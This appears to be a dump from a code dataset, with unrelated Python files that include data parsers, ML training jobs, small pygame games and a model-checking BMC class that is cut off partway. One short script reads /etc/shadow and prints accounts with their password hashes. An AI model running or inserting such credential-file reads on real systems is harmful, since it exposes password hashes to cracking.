13,184 | 80c88ffc5991cd732a905ccf0680c42c6f06813a | import sys
max_temp, min_temp = float('-inf'), float('inf')
# input comes from STDIN (standard input)
for line in sys.stdin:
# remove leading and trailing whitespace
line = line.strip()
# split the line into tokens
_, time, temperature = line.split(',')
try:
temperature = float(temperature.strip())
max_temp = max(max_temp, temperature)
min_temp = min(min_temp, temperature)
except:
pass
print((max_temp, min_temp))
|
13,185 | a6ace19c1bb2c3369120319299ac34e1c6165830 | # Generated by Django 3.1.2 on 2020-10-21 11:34
from django.db import migrations, models
class Migration(migrations.Migration):
    # Auto-generated migration: adds email/location/type_business to
    # Establishments and widens sublocs/username, all defaulting to "-".
    # Do not edit applied migrations.
    dependencies = [
        ('nus', '0006_establishments_patrons_queries_reservations'),
    ]
    operations = [
        migrations.AddField(
            model_name='establishments',
            name='email',
            field=models.CharField(default='-', max_length=50),
        ),
        migrations.AddField(
            model_name='establishments',
            name='location',
            field=models.CharField(default='-', max_length=100),
        ),
        migrations.AddField(
            model_name='establishments',
            name='type_business',
            field=models.CharField(default='-', max_length=50),
        ),
        migrations.AlterField(
            model_name='establishments',
            name='sublocs',
            field=models.TextField(default='-', max_length=100),
        ),
        migrations.AlterField(
            model_name='establishments',
            name='username',
            field=models.CharField(default='-', max_length=50),
        ),
    ]
|
13,186 | e2b2217000679d4df0dcbd294f143d68947843cb | from .UpdaterTransmissionNegotiation import NegotiationResultInterface, TransmissionNegotiationInterface
from .Updater import UpdaterInterface, UpdaterAlgorithmInterface
from .UpdaterDataProcessor import UpdaterDataProcessorInterface
from .UpdaterDataAssembly import DataAssemblyInterface
|
13,187 | d50e3c6febbe5fce2d00bbcfee8d3e6999433180 | import pandas as pd
import numpy as np
# Extract the expression matrix from a GEO series file and append a recoded
# tumour/healthy label row, writing the result to series_matrix.txt.
try:
    f = open("GSE10810_series_matrix.txt")
except IOError:
    # Bug fix: the original printed "File myfile.fa does not exist!!" (wrong
    # file) and then kept running, crashing with NameError on `f`.
    print("File GSE10810_series_matrix.txt does not exist!!")
    raise SystemExit(1)

# First pass: find the sample-characteristics row that carries the
# "tumor (t) vs healthy (s)" annotation for every sample column.
Y = []
for line in f:
    line = line.rstrip()
    if line[29:55] == 'tumor (t) vs healthy (s): ':
        Y = line.split("\t")
        break

# Recode the labels: healthy (S) -> "0", tumour (T) -> "1"; any other cell
# (the row-name column) becomes a readable header. The "healty" typo is kept
# so the generated file stays byte-compatible with downstream consumers.
for i in range(0, len(Y)):
    if Y[i] == '"tumor (t) vs healthy (s): S"':
        Y[i] = "0"
    elif Y[i] == '"tumor (t) vs healthy (s): T"':
        Y[i] = "1"
    else:
        Y[i] = 'tumor (1) vs healty (0)'
Y_series_matrix = '\t'.join(Y)

try:
    D = open("series_matrix.txt", 'w')
except IOError:
    # Bug fix: message used to name the wrong file and execution continued.
    print("File series_matrix.txt could not be created!!")
    f.close()
    raise SystemExit(1)

# Second pass (the handle resumes where the first loop stopped): copy every
# line between the table begin/end markers verbatim.
Start_Reading = False
for Original_line in f:
    line = Original_line.rstrip()
    if line == '!series_matrix_table_begin':
        Start_Reading = True
    elif Start_Reading == True and line != '!series_matrix_table_end':
        D.write(Original_line)
    elif line == '!series_matrix_table_end':
        break
# Append the recoded label row as the final line of the output.
D.write(Y_series_matrix)
D.close()
f.close()
|
13,188 | 482340a7dd428c5f0c682963e78630e6fdfb34dd | import os
import random
from typing import List, Tuple, Callable
import tensorflow as tf
import cpath
from cache import load_pickle_from, save_list_to_jsonl_w_fn
from data_generator.NLI.nli_info import nli_tokenized_path
from data_generator.job_runner import WorkerInterface
from dataset_specific.mnli.mnli_reader import MNLIReader
from job_manager.job_runner_with_server import JobRunnerS
from misc_lib import ceil_divide, TimeEstimator
from port_info import LOCAL_DECISION_PORT
from trainer.promise import PromiseKeeper, MyPromise
from trainer_v2.chair_logging import c_log
from trainer_v2.custom_loop.inference import InferenceHelper
from trainer_v2.custom_loop.per_task.nli_ts_util import load_local_decision_model, dataset_factory_600_3
from trainer_v2.keras_server.nlits_client import NLITSClient
from trainer_v2.per_project.cip.cip_common import get_random_split_location, split_into_two, \
SegmentationTrialInputs, SegmentationTrials
from trainer_v2.per_project.cip.nlits_direct import TS600_3_Encoder, reslice_local_global_decisions
from trainer_v2.per_project.cip.path_helper import get_nlits_segmentation_trial_save_path, \
get_nlits_segmentation_trial_subjob_save_dir
from trainer_v2.train_util.get_tpu_strategy import get_strategy2
def try_segmentations_and_save(
        nltis_server_addr,
        base_seq_length,
):
    """For every MNLI train example, score 10 random hypothesis splits via a
    remote NLITS server and save the trials as JSONL.

    nltis_server_addr -- host of the NLITS prediction server
    base_seq_length   -- sequence length the server's encoder expects
    """
    split = "train"
    reader = MNLIReader()
    query_batch_size = 64
    num_step = ceil_divide(reader.get_data_size(split), query_batch_size)
    ticker = TimeEstimator(num_step)
    # Each item is (premise_ids, hypothesis_ids, label).
    data: List[Tuple[List[int], List[int], int]] = load_pickle_from(nli_tokenized_path(split))
    nlits_client: NLITSClient = NLITSClient(nltis_server_addr, LOCAL_DECISION_PORT, base_seq_length)
    predict_fn = nlits_client.request_multiple_from_ids_triplets
    n_try = 10
    cursor = 0
    all_save_entries: List[SegmentationTrials] = []
    # Batch requests to the server to amortize round-trip cost.
    while cursor < len(data):
        data_slice = data[cursor: cursor+query_batch_size]
        save_entry: List[SegmentationTrials] = do_batch_request(data_slice, n_try, predict_fn)
        all_save_entries.extend(save_entry)
        cursor += query_batch_size
        ticker.tick()
    save_path = get_nlits_segmentation_trial_save_path(split)
    save_list_to_jsonl_w_fn(all_save_entries, save_path, SegmentationTrials.to_json)
def do_batch_request(item_list, n_try, predict_fn: Callable[[List[Tuple[List, List, List]]], List]):
    """Score n_try random hypothesis segmentations for each (prem, hypo,
    label) item, batching all predictions through one PromiseKeeper call.

    Returns one SegmentationTrials per input item, carrying the split
    locations and the resolved predictions.
    """
    c_log.info("do_batch_request")
    pk2 = PromiseKeeper(predict_fn)
    si_list = []
    for item in item_list:
        prem, hypo, label = item
        ts_input_list: List[Tuple[List, List, List]] = []
        ts_input_info_list = []
        # Sample n_try random (start, end) split points of the hypothesis.
        for _ in range(n_try):
            st, ed = get_random_split_location(hypo)
            hypo1, hypo2 = split_into_two(hypo, st, ed)
            ts_input = prem, hypo1, hypo2
            ts_input_list.append(ts_input)
            ts_input_info_list.append((st, ed))
        # Futures resolve after pk2.do_duty() runs the batched prediction.
        comparison_future = SegmentationTrialInputs(
            prem, hypo, label,
            [MyPromise(ts_input, pk2).future() for ts_input in ts_input_list],
            ts_input_info_list
        )
        si_list.append(comparison_future)
    pk2.do_duty()
    save_entry = list(map(SegmentationTrials.from_sti, si_list))
    return save_entry
class SegmentationTrialWorker(WorkerInterface):
    """Job-runner worker: scores segmentation trials for one slice of the
    MNLI train set with a locally loaded model (no prediction server)."""
    def __init__(self, n_item_per_job, output_dir):
        self.output_dir = output_dir
        split = "train"
        self.n_item_per_job = n_item_per_job
        # Full tokenized train set; each job works on its own slice.
        self.data: List[Tuple[List[int], List[int], int]] = load_pickle_from(nli_tokenized_path(split))
        model_path = cpath.get_canonical_model_path2("nli_ts_run87_0", "model_12500")
        strategy = get_strategy2(use_tpu=False, tpu_name=None, force_use_gpu=True)
        def model_factory():
            model: tf.keras.models.Model = load_local_decision_model(model_path)
            return model
        self.inference_helper = InferenceHelper(model_factory, dataset_factory_600_3, strategy)
        self.encoder_helper = TS600_3_Encoder()
    def _predict(self, triplet_payload):
        # Encode (prem, hypo1, hypo2) triplets, run the model, and reshape
        # the stacked output back into per-item local/global decisions.
        payload = self.encoder_helper.combine_ts_triplets(triplet_payload)
        stacked_output = self.inference_helper.predict(payload)
        output = reslice_local_global_decisions(stacked_output)
        return output
    def work(self, job_id):
        # Fixed seed so each job's random split locations are reproducible.
        random.seed(0)
        st = self.n_item_per_job * job_id
        ed = st + self.n_item_per_job
        data_slice = self.data[st:ed]
        n_try = 10
        save_entry: List[SegmentationTrials] = do_batch_request(data_slice, n_try, self._predict)
        save_path = os.path.join(self.output_dir, str(job_id))
        save_list_to_jsonl_w_fn(save_entry, save_path, SegmentationTrials.to_json)
def main():
    """Partition ~400k train items into 5k-item jobs and run them through
    the job-runner infrastructure."""
    n_item = 400 * 1000
    n_item_per_job = 5000
    n_jobs = ceil_divide(n_item, n_item_per_job)
    def factory(output_dir):
        # One worker per job; the runner supplies the output directory.
        return SegmentationTrialWorker(n_item_per_job, output_dir)
    w_path = get_nlits_segmentation_trial_subjob_save_dir()
    job_runner = JobRunnerS(w_path, n_jobs, "nlits_trials", factory)
    job_runner.auto_runner()
if __name__ == "__main__":
    main()
|
13,189 | caa5d0eadd0f78630c929ebb0be7c7d78af30fdc | from turtle import Turtle
class Paddle(Turtle):
    """A white rectangular pong paddle that slides vertically in 20-px steps."""

    def __init__(self, x_position, y_position) -> None:
        super().__init__()
        self.penup()  # never draw a trail while moving
        # A square stretched 5x tall and 1x wide gives the paddle shape.
        self.shape("square")
        self.shapesize(stretch_len=1, stretch_wid=5)
        self.color("white")
        self.width(20)
        self.x_position = x_position
        self.y_position = y_position
        self.setposition(self.x_position, self.y_position)

    def moveup(self):
        """Slide the paddle 20 pixels up."""
        self.goto(self.xcor(), self.ycor() + 20)

    def movedown(self):
        """Slide the paddle 20 pixels down."""
        self.goto(self.xcor(), self.ycor() - 20)
13,190 | 38906618e24abef24aa43c0cbbdd1313760544c1 | # coding=utf-8
import numpy as np
# from sklearn.externals import joblib
import joblib
from sklearn.metrics import confusion_matrix
# from sklearn.datasets import make_blobs
from sklearn.ensemble import RandomForestClassifier
# from sklearn.ensemble import ExtraTreesClassifier
# from sklearn.tree import DecisionTreeClassifier
# from sklearn.linear_model import SGDClassifier
# from sklearn.metrics import classification_report
# from sklearn.model_selection import train_test_split
# from sklearn.model_selection import cross_val_predict
from sklearn import metrics
from sklearn import svm
from data_common.image_common.config import *
from data_common.image_common.image_process import ImageProcess
from data_common.utils.file_util import file_util
from data_common.utils.pool_util import PoolUtility
class ModelProcess:
    """Utility methods for training, persisting and evaluating captcha
    character classifiers."""

    @staticmethod
    def model_save(model, model_path):
        """Persist *model* to *model_path* and return it for chaining."""
        joblib.dump(model, model_path)
        return model

    @staticmethod
    def model_load(model_path):
        """Load a previously saved model from *model_path*."""
        return joblib.load(model_path)

    @staticmethod
    def model_predict(model, data):
        """Run *model* on *data* and return the predicted labels."""
        return model.predict(data)

    @staticmethod
    def image_PCA_model(x_train, y_train, x_test):
        """Fit PCA on the training features and project both splits.

        Keeps enough components to explain 90% of the variance, whitened.
        *y_train* is accepted for signature compatibility only; PCA is
        unsupervised and ignores it.
        """
        pca = PCA(n_components=0.9, whiten=True)
        # Learn the projection from the training features.
        pca.fit(x_train)
        # Bug fix: the original called pca.transform(y_train), projecting the
        # *labels* instead of the training features.
        x_train_pca = pca.transform(x_train)
        x_test_pca = pca.transform(x_test)
        return x_train_pca, x_test_pca

    @staticmethod
    def model_train(data, labels, model_path):
        """Train a random-forest classifier on (data, labels), save it to
        *model_path* and return the fitted model."""
        print("trainning process >>>>>>>>>>>>>>>>>>>>>>")
        # Earlier SVM experiments, kept for reference:
        # rbf = svm.SVC(kernel='rbf')
        # rbf.fit(data, labels)
        # linear = svm.SVC(decision_function_shape='ovo', kernel='linear')
        # linear.fit(data, labels)
        rf = RandomForestClassifier(n_estimators=100, max_depth=None, min_samples_split=2, random_state=0)
        rf.fit(data, labels)
        return ModelProcess.model_save(rf, model_path)

    @staticmethod
    def model_test(model, data, label):
        """Print weighted precision/recall/F1 and the confusion matrix for
        *model* evaluated on (data, label)."""
        predict_list = ModelProcess.model_predict(model, data)
        print("\ntest process >>>>>>>>>>>>>>>>>>>>>>>>")
        print("test precision: ", metrics.precision_score(label, predict_list, average='weighted'))  # precision
        print("test recall: ", metrics.recall_score(label, predict_list, average='weighted'))  # recall
        print("test f1 score: ", metrics.f1_score(label, predict_list, average='weighted'))  # f1 score
        print("confusion matrix:")
        print(confusion_matrix(label, predict_list))  # confusion matrix

    @staticmethod
    def model_data_generate(train_data_path=None, captcha_path=None):
        """Build (features, labels) numpy arrays from labeled training
        images and/or captcha images; either source may be omitted."""
        image_list = []
        label_list = []
        if train_data_path:
            for image, label in ImageProcess.image_train_data_read(train_data_path):
                image_list.append(ImageProcess.feature_transfer(image))
                label_list.append(label)
        if captcha_path:
            for image_name, label, image in ImageProcess.image_captcha_path(captcha_path):
                image_list.append(ImageProcess.feature_transfer(image))
                label_list.append(label)
        return np.array(image_list), np.array(label_list)

    @staticmethod
    def feature_transfer_iter(iter_args):
        """Pool worker helper: unpack one (name, label, image) triple and
        extract its feature vector."""
        image_name, label, image = iter_args
        img = ImageProcess.feature_transfer(image)
        return image_name, label, img

    @staticmethod
    def model_data_generate_iter():
        """Extract features for up to 100 captcha images using a process
        pool of 5 workers and print each result."""
        iter_results = ImageProcess.image_captcha_path(captcha_path, limit=100)
        results = PoolUtility.process_pool_iter(ModelProcess.feature_transfer_iter, iter_results, 5)
        for result in results:
            print(result)
class AutoDefineModel(ModelProcess):
    """Subclass hook: override model_train with a custom model (placeholder)."""
    @staticmethod
    def model_train(data, labels, model_path):
        # Intentionally unimplemented; see ModelProcess.model_train.
        pass
if __name__ == '__main__':
    # Current entry point: pooled feature extraction over captcha images.
    ModelProcess.model_data_generate_iter()
    # Full train/test pipeline, kept for reference:
    # image_list, label_list = ModelProcess.model_data_generate(train_data_path=train_data_path)
    # ModelProcess.model_train(image_list, label_list, model_path)
    #
    # model = ModelProcess.model_load(model_path)
    #
    # image_list_test, label_list_test = ModelProcess.model_data_generate(captcha_path=test_data_path)
    # ModelProcess.model_test(model, image_list_test, label_list_test)
|
13,191 | c6a1d978c1a906722a5aaacbb8863e6904a809ab | import pygame
import time
import sys
# Colour palette for the game surface and the snake.
black = pygame.Color(0, 0, 0)
white = pygame.Color(255, 255, 255)
red = pygame.Color(255, 0, 0)
green = pygame.Color(0, 255, 0)
blue = pygame.Color(0, 0, 255)
clock=pygame.time.Clock()
# NOTE(review): pygame.init() returns an (ok, failed) counter tuple, not a
# surface — the name `screen` is misleading; the drawable surface is
# `game_window` below.
screen = pygame.init()
pygame.display.set_caption('snake game')
game_window = pygame.display.set_mode((700,500))
game_window.fill(red)
pygame.display.update()
snake_size=10          # side length in pixels of one snake segment
snake_list=[]          # history of direction key presses (see game_loop)
initial_direction=0    # 0 until the first arrow key is pressed
def snake(snake_size, snake_list):
    """Draw one square per snake segment onto the game window.

    Bug fix: the loop bound each element to ``i`` but drew with the undefined
    name ``x``, raising NameError as soon as the list was non-empty.

    :param snake_size: side length in pixels of each square segment.
    :param snake_list: iterable of (x, y) positions for the segments.
    """
    for segment in snake_list:
        pygame.draw.rect(game_window, blue,
                         [segment[0], segment[1], snake_size, snake_size])
def game_loop():
    """Main game loop: poll arrow-key events, update the head position, and
    redraw the single moving square at 25 frames per second.

    Direction changes are appended to the module-level `snake_list`; the
    previous entry (`snake_list[-2]`) is consulted to forbid an immediate
    180-degree reversal.
    """
    global initial_direction
    global snake_list
    # Head starts at the centre of the 700x500 window.
    x=350
    y=200
    y_change=0
    x_change=0
    while True:
        for event in pygame.event.get():
            if event.type == pygame.QUIT:
                pygame.quit()
                sys.exit()
            if event.type==pygame.KEYDOWN:
                # Record every direction key press; the history is used below
                # to detect attempted reversals.
                if event.key==pygame.K_LEFT:
                    initial_direction="left"
                    snake_list.append(initial_direction)
                elif event.key==pygame.K_RIGHT:
                    initial_direction="right"
                    snake_list.append(initial_direction)
                elif event.key==pygame.K_UP:
                    initial_direction="up"
                    snake_list.append(initial_direction)
                elif event.key==pygame.K_DOWN:
                    initial_direction="down"
                    snake_list.append(initial_direction)
        # `snake_list[-2]` raises IndexError until two keys were pressed; the
        # bare except below catches that first-move case (and, as a side
        # effect, any other error — NOTE(review): narrow to IndexError).
        try:
            if initial_direction=="right":
                if snake_list[-2]=="left":
                    print("sname")
                else:
                    x_change=snake_size
                    y_change=0
            elif initial_direction=="left":
                if snake_list[-2]=="right":
                    pass
                else:
                    x_change=-snake_size
                    y_change=0
            elif initial_direction=="up":
                if snake_list[-2]=="down":
                    pass
                else:
                    y_change=-snake_size
                    x_change=0
            elif initial_direction=="down":
                if snake_list[-2]=="up":
                    pass
                else:
                    y_change=snake_size
                    x_change=0
        except:
            # First key press: no previous direction to compare against.
            if initial_direction=="right":
                x_change=snake_size
                y_change=0
                print("initiated")
            elif initial_direction=="left":
                x_change=-snake_size
                y_change=0
                print("initiated")
            elif initial_direction=="up":
                y_change=-snake_size
                x_change=0
                print("initiated")
            elif initial_direction=="down":
                y_change=snake_size
                x_change=0
                print("initiated")
        # Advance the head, repaint, and cap the frame rate.
        x=x+x_change
        y=y+y_change
        pygame.display.update()
        pygame.draw.rect(game_window,blue,[x,y,snake_size,snake_size])
        pygame.display.update()
        clock.tick(25)
        game_window.fill(black)
game_loop()
#!/usr/bin/python
import sys
#Print a list of usernames
# Python 2 script: reads /etc/shadow (requires root) and prints one entry per
# account.  With the -p flag, only accounts that have a password hash are
# printed, together with that hash.
filename = "/etc/shadow"
myfile = open(filename)
lines = myfile.readlines()
myfile.close()
PASSONLY = False
# -p switches to "accounts with a real password hash" mode.
if(len(sys.argv)>1 and sys.argv[1]=='-p'):
    PASSONLY = True
for line in lines:
    #put code here
    # shadow format is colon-separated; field 0 = username, field 1 = hash
    # (a single '*' or '!' means no usable password).
    tokens = line.split(':')
    if(PASSONLY):
        if(len(tokens[1])>1):
            print tokens[0:2]
    else:
        print tokens[0]
from typing import Iterator, Tuple, List, Optional, Union, Dict, FrozenSet, Set
from itertools import count, chain
from enum import IntEnum
from pysmt.fnode import FNode
import pysmt.typing as types
from pysmt.environment import Environment as PysmtEnv
from pysmt.exceptions import SolverReturnedUnknownResultError
from utils import (symb_to_next, to_next, to_curr, log, assign2fnodes, new_symb,
not_rel)
from multisolver import MultiSolver
from canonize import Canonizer
from rewritings import TimesDistributor
from expr_at_time import ExprAtTime
from generalise import Generaliser
from rankfun import RankFun
from hint import Hint, TransType
class HintMode(IntEnum):
    """Policy for activating hints in the BMC encoding (see BMC.__init__)."""
    MAY = 0   # hints may be active or not; solver decides (preferred vars)
    MUST = 1  # at least one hint must be active
    ALL = 2   # every hint must be active
class BMC:
    """Iterate over abstract loops via BMC"""
    _LOG_LVL = 1  # verbosity level passed to `log`
    _PRED_MONITOR_STR = "_bmc"  # prefix for internally generated monitor symbols
    _TIMEOUT = 30  # solver timeout (seconds), see MultiSolver
    _MAX_K = -1  # max BMC unrolling depth; <= 0 means unbounded
    _HINT_MODE = HintMode.MUST  # default hint-activation policy
    @staticmethod
    def set_timeout(value: int) -> None:
        """Set the solver timeout (seconds) shared by all BMC instances."""
        assert isinstance(value, int)
        BMC._TIMEOUT = value
    @staticmethod
    def get_timeout() -> int:
        """Return the configured solver timeout in seconds."""
        return BMC._TIMEOUT
    @staticmethod
    def set_max_k(val: int) -> None:
        """Set the maximum BMC bound; None or a non-positive value disables it."""
        assert val is None or isinstance(val, int)
        BMC._MAX_K = val
    @staticmethod
    def get_max_k() -> int:
        """Return the maximum BMC bound (<= 0 means unbounded)."""
        return BMC._MAX_K
    @staticmethod
    def get_hints_mode() -> HintMode:
        """Return the current hint-activation policy."""
        return BMC._HINT_MODE
    @staticmethod
    def set_hints_mode(val: HintMode) -> None:
        """Set the hint-activation policy (MAY / MUST / ALL)."""
        assert isinstance(val, HintMode)
        BMC._HINT_MODE = val
    def __init__(self, env: PysmtEnv, init: FNode, trans: FNode, fair: FNode,
                 hints: FrozenSet[Hint], all_symbs: FrozenSet[FNode]):
        """Build the BMC encoding for the given fair transition system.

        The outer formulas (init, trans, fair, hints, symbols) are normalised
        into a private pysmt environment; hint transition systems, monitor
        symbols for loop-back detection, and the `bad` condition used by
        `gen_loops` are all constructed here.

        :param env: outer pysmt environment the inputs live in.
        :param init: initial-states predicate over `all_symbs`.
        :param trans: transition relation over current and next symbols.
        :param fair: fairness condition over `all_symbs`.
        :param hints: set of Hints (unique by name) to weave into the search.
        :param all_symbs: all state symbols of the transition system.
        """
        assert isinstance(env, PysmtEnv)
        assert isinstance(init, FNode)
        assert isinstance(trans, FNode)
        assert isinstance(fair, FNode)
        assert isinstance(hints, frozenset)
        assert all(isinstance(h, Hint) for h in hints)
        assert all(h0 is h1 or h0.name != h1.name
                   for h0 in hints for h1 in hints)
        assert isinstance(all_symbs, frozenset)
        assert all(isinstance(s, FNode) for s in all_symbs)
        assert all(s in env.formula_manager.get_all_symbols()
                   for s in all_symbs)
        # Keep outer environment (o_*) and a fresh inner one (i_*) apart;
        # all solving happens in the inner env, results are normalised back.
        self.o_env = env
        self.o_mgr = env.formula_manager
        self.o_norm = self.o_mgr.normalize
        self.i_env = PysmtEnv()
        self.i_mgr = self.i_env.formula_manager
        self.i_norm = self.i_mgr.normalize
        i_get_free_vars = self.i_env.fvo.get_free_variables
        i_get_atoms = self.i_env.ao.get_atoms
        self.totime = ExprAtTime(self.i_env,
                                 ignore_pref=BMC._PRED_MONITOR_STR)
        self.td = TimesDistributor(self.i_env)
        self.cn = Canonizer(env=self.i_env)
        self.generaliser = Generaliser(self.i_env, self.cn, self.totime)
        # Sort by name for determinism; one activation symbol per hint.
        self.hints = sorted((h.to_env(self.i_env) for h in hints),
                            key=lambda h: h.name)
        self.hint_active = [self._fresh_symb(f"{BMC._PRED_MONITOR_STR}_{h.name}")
                            for h in self.hints]
        hints_ts = [h.get_trans_system(active)
                    for h, active in zip(self.hints, self.hint_active)]
        hint_loc_active = [active for (_, _, _, active) in hints_ts]
        # hint_active symbs must be frozen.
        assert all(self.totime(s, 5) == s for s in self.hint_active)
        self.hint_symbs = frozenset(
            chain.from_iterable(symbs for (symbs, _, _, _) in hints_ts))
        self.orig_symbs = frozenset(self.i_norm(s) for s in all_symbs)
        self.all_symbs = frozenset.union(self.hint_symbs, self.orig_symbs,
                                         self.hint_active)
        # init of transition system.
        self.init = [self.i_norm(init)]
        # init of Hints encoding
        self.init.extend(chain.from_iterable(
            hint_init for (_, hint_init, _, _) in hints_ts))
        self._orig_trans = self.i_norm(trans)
        self.trans = [self._orig_trans]
        self.trans.extend(chain.from_iterable(
            hint_trans for (_, _, hint_trans, _) in hints_ts))
        assert all(isinstance(t, FNode) for t in self.trans)
        fair = self.cn(self.i_norm(fair))
        assert fair in self.i_mgr.formulae.values()
        assert all(s in self.i_mgr.get_all_symbols()
                   for s in i_get_free_vars(fair))
        assert all(s in self.i_mgr.get_all_symbols()
                   for s in self.orig_symbs)
        assert i_get_free_vars(fair) <= self.orig_symbs
        assert all(i_get_free_vars(t) <= self.all_symbs |
                   frozenset(symb_to_next(self.i_mgr, s)
                             for s in self.all_symbs)
                   for t in self.trans)
        # collect atoms for abstract loop-back detection.
        lback_atms = set()
        for pred in chain(i_get_atoms(fair),
                          (self.cn(p) for c_init in self.init
                           for p in i_get_atoms(c_init)
                           if i_get_free_vars(p) <= self.orig_symbs)):
            assert i_get_free_vars(pred) <= self.orig_symbs
            assert self.cn(pred) == pred
            lback_atms.add(pred)
            if pred.is_equals():
                # Track the strict inequality too, so loop-back states can
                # distinguish < from = for the same pair of terms.
                lt_pred = self.cn(self.i_mgr.LT(pred.arg(0), pred.arg(1)))
                lback_atms.add(lt_pred)
        for pred in chain.from_iterable(i_get_atoms(t) for t in self.trans):
            free_v = i_get_free_vars(pred)
            intsec_size = len(free_v & self.all_symbs)
            # either all current or all next.
            if intsec_size == len(free_v) or intsec_size == 0:
                pred = to_curr(self.i_mgr, pred, self.all_symbs) \
                    if intsec_size == 0 else pred
                pred = self.cn(pred)
                lback_atms.add(pred)
                if pred.is_equals():
                    lt_pred = self.cn(self.i_mgr.LT(pred.arg(0), pred.arg(1)))
                    lback_atms.add(lt_pred)
        assert all(i_get_free_vars(s) <= self.all_symbs
                   for s in lback_atms)
        assert all(self.cn(atm) == atm for atm in lback_atms)
        assert all(a.is_theory_relation() or
                   (a.is_symbol() and a.symbol_type().is_bool_type())
                   for a in lback_atms)
        if self.hints:
            # active Hints must have disjoint symbols.
            self.init.extend(Hint.disjoint_symbs(self.i_env, self.hints,
                                                 self.hint_active))
            # invariant: minimise 1 ranking function at a time.
            at_most_1_ranked = list(Hint.at_most_1_ranked(self.i_env, self.hints,
                                                          self.hint_active))
            self.init.extend(at_most_1_ranked)
            self.trans.extend(to_next(self.i_mgr, pred, self.all_symbs)
                              for pred in at_most_1_ranked)
            # add constraint corresponding to hint encoding mode.
            if BMC.get_hints_mode() is HintMode.MUST:
                self.init.append(self.i_mgr.Or(self.hint_active))
            elif BMC.get_hints_mode() is HintMode.ALL:
                self.init.append(self.i_mgr.And(self.hint_active))
            else:
                assert BMC.get_hints_mode() is HintMode.MAY
        # One frozen monitor symbol per state symbol: monitors capture the
        # candidate loop-back state so it can be compared at a later step.
        self.symb2monitor = \
            {s: self._fresh_symb(f"{BMC._PRED_MONITOR_STR}_{s.symbol_name()}",
                                 m_type=s.symbol_type())
             for s in chain(self.orig_symbs, self.hint_symbs)}
        # self.rank_funs: List[RankFun] = []
        self._new_rank_fun = False
        subst = self.i_env.substituter.substitute
        self._in_loop = self._fresh_symb("inloop")
        self.init.append(self.i_mgr.Not(self._in_loop))
        # loop begins if all(symb == monitor) & all(h_active -> h_loc_active)
        start_loop = self.i_mgr.And(
            chain(assign2fnodes(self.i_env, self.symb2monitor),
                  (self.i_mgr.Implies(h_act, h_loc_act)
                   for h_act, h_loc_act in zip(self.hint_active,
                                               hint_loc_active))))
        if __debug__:
            self.start_loop = start_loop
        self.trans.append(
            self.i_mgr.Implies(symb_to_next(self.i_mgr, self._in_loop),
                               self.i_mgr.Or(self._in_loop, start_loop)))
        # self.trans.append(
        #     self.i_mgr.Implies(self._in_loop,
        #                        symb_to_next(self.i_mgr, self._in_loop)))
        # monitors and symbols agree on truth assignment of all lback_atms
        self.bad = [self.i_mgr.Iff(subst(atm, self.symb2monitor), atm)
                    for atm in lback_atms]
        self.bad.append(fair)
        self.bad.append(self._in_loop)
        # learn ranking functions provided by the hints.
        if hints is not None:
            self._add_ranking_funs([loc.rf.to_env(self.i_env)
                                    for h in hints for loc in h.locs
                                    if loc.rf is not None])
    def _fresh_symb(self, base: str, m_type=types.BOOL) -> FNode:
        """Return a fresh symbol named after `base` in the inner environment."""
        return new_symb(self.i_mgr, base, m_type)
    def add_ranking_funs(self, ranks: List[RankFun]) -> None:
        """Learn ranking functions given in the OUTER environment.

        Each function is translated into the inner environment before being
        recorded via `_add_ranking_funs`.
        """
        assert isinstance(ranks, list)
        assert all(isinstance(rank, RankFun) for rank in ranks)
        assert all(rank.env == self.o_env for rank in ranks)
        self._add_ranking_funs([rank.to_env(self.i_env) for rank in ranks])
    def add_ranking_fun(self, rank: RankFun) -> None:
        """Learn a single ranking function given in the OUTER environment."""
        assert isinstance(rank, RankFun)
        assert rank.env == self.o_env
        self._add_ranking_funs([rank.to_env(self.i_env)])
def _add_ranking_funs(self, ranks: List[RankFun]) -> None:
assert isinstance(ranks, list)
assert all(isinstance(rank, RankFun) for rank in ranks)
assert all(rank.env == self.i_env for rank in ranks)
self._new_rank_fun = True
self.bad.extend(self.cn(self.i_mgr.Not(
to_curr(self.i_mgr,
self.i_env.substituter.substitute(self.i_norm(r.progress_pred()),
self.symb2monitor),
self.all_symbs)))
for r in ranks)
    def gen_loops(self) -> Iterator[
            Tuple[Optional[list],
                  Optional[int],
                  Union[Optional[Tuple[List[FrozenSet[FNode]],
                                       List[FrozenSet[FNode]]]],
                        bool],
                  Union[Optional[Tuple[List[Hint],
                                       List[FrozenSet[FNode]],
                                       List[FrozenSet[FNode]],
                                       List[Tuple[RankFun, int, int]]]],
                        bool]]]:
        """Yield candidate abstract loops found by iteratively deepening BMC.

        Each yielded tuple is (trace, lback_idx, abstraction, hint_info):
        - (None, None, None, None) signals a solver timeout (a path may have
          been skipped);
        - (trace, lback_idx, False, False) is a CONCRETE lasso (last state
          equals the loop-back state);
        - otherwise `abstraction` carries the generalised (states, trans)
          predicate lists and `hint_info` the active hints with their region,
          transition, and ranking-function data, all normalised to the outer
          environment.
        After every candidate, a refinement clause excluding it is asserted so
        the next iteration produces a different loop.
        """
        assert all(pred in self.i_mgr.formulae.values() for pred in self.init)
        assert all(t in self.i_mgr.formulae.values() for t in self.trans)
        # assert self.fair in self.i_mgr.formulae.values()
        assert all(b in self.i_mgr.formulae.values() for b in self.bad)
        serialize = self.i_env.serializer.serialize
        with MultiSolver(self.i_env, BMC.get_timeout(),
                         pref_vars=self.hint_active
                         if BMC.get_hints_mode() is HintMode.MAY else None,
                         log_lvl=BMC._LOG_LVL) as solver:
            timed_symbs = [frozenset(self.totime(s, 0)
                                     for s in chain(self.orig_symbs,
                                                    self.hint_symbs))]
            for pred in self.init:
                solver.add_assertion(self.totime(pred, 0))
            # BMC steps.
            for k in count(start=0, step=1):  # BMC steps.
                if BMC.get_max_k() > 0 and k > BMC.get_max_k():
                    return
                assert len(timed_symbs) == k + 1, (len(timed_symbs), k)
                timed_symbs.append(frozenset(self.totime(s, k + 1)
                                             for s in chain(self.orig_symbs,
                                                            self.hint_symbs)))
                # trans from k to k + 1
                for t in self.trans:
                    solver.add_assertion(self.totime(t, k))
                # Push so that `bad` and the per-k refinements can be retracted
                # before deepening to k + 1.
                solver.push()
                for pred in self.bad:
                    solver.add_assertion(self.totime(pred, k + 1))
                self._new_rank_fun = False
                ref = None
                sat: Optional[bool] = True
                refinements: List[FNode] = []
                # enumerate loops in paths of length k + 2
                while sat:
                    log(f"\tBMC k = {k + 2}"
                        f' refinement = {"; ".join(serialize(r) for r in refinements)}',
                        BMC._LOG_LVL)
                    if self._new_rank_fun:
                        # A ranking function was learned meanwhile: `bad` grew,
